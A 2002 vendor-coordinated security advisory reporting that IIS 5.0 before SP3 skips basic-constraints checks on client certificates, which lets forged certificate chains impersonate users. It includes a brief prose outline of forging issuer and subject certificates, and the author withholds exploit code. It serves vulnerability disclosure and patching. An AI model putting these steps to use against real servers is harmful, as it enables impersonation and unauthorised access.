---------------------------------------------------------------------------- ------- Sentor Torparfar Advisory #001 Title: Insufficient Verification of Client Certificates in IIS 5.0 pre sp3 Date: August 16, 2002 Author: Johan Persson <johan.person@sentor.se> ---------------------------------------------------------------------------- ------- Summary: When an SSL connection is set up between IIS 5.0 pre sp3 and a client the server verifies that the client certificate is ultimately issued by a trusted root authority (as defined by CTL) and that none of the certificates in the chain have expired. There are serveral checks that are not being done. In particular there is no verification of basic constraints. Since the all subsequent validity checks (client certificate mapping, ASP methods etc) only deal with the subfields (O, OU, CN, etc) of the subject and/or issuer it is trivial to spoof your identity. Details: Vulnerable systems: Windows 2000, IIS 5.0 pre sp3 Not Vulnerable: Windows 2000, IIS 5.0 sp3 I have no idea if there are similar vulnerabilities in any of the other versions of IIS, as I haven't checked. Description: The validity of a client certificate chain is not properly checked on the server side in a SSL connection involving an IIS 5.0 pre sp3. In particular there is no verification of basic constraints. Since client certificate mapping as well as other methods of authentication using certificates relies on the information contained in the subfields of the subject (client) and issuer it is possible to create false credentials that can be used to impersonate any valid user. Impact: In a system that relies on client side certificates for authentication it is possible to impersonate any user whose public details (certificate subfields) are known Exploit: Get a (any) valid certificate which is ultimately issued by a root authority trusted by the target server. Create a certificate request containing whatever fields you need to impersonate the issuer you want to spoof. Sign this request using the private key corresponding to your valid certificate. Create a certificate request containing whatever fields you need to impersonate the subject you want to spoof Sign this request using the private key that corresponds to the certificate you created in step 3 I will not release detailed exploit information. Openssl and some experimenting should suffice. Vendor Status: Microsoft contacted June 24, 2002 Microsoft provided me with a hotfix July 18, 2002 The fix is included in Service Pack 3 Solution: Get and install Service Pack 3 from Microsoft 0nd/Ag3nt0nd/0rm/Torparfar ---------------------------------------------------------------------------- -----------
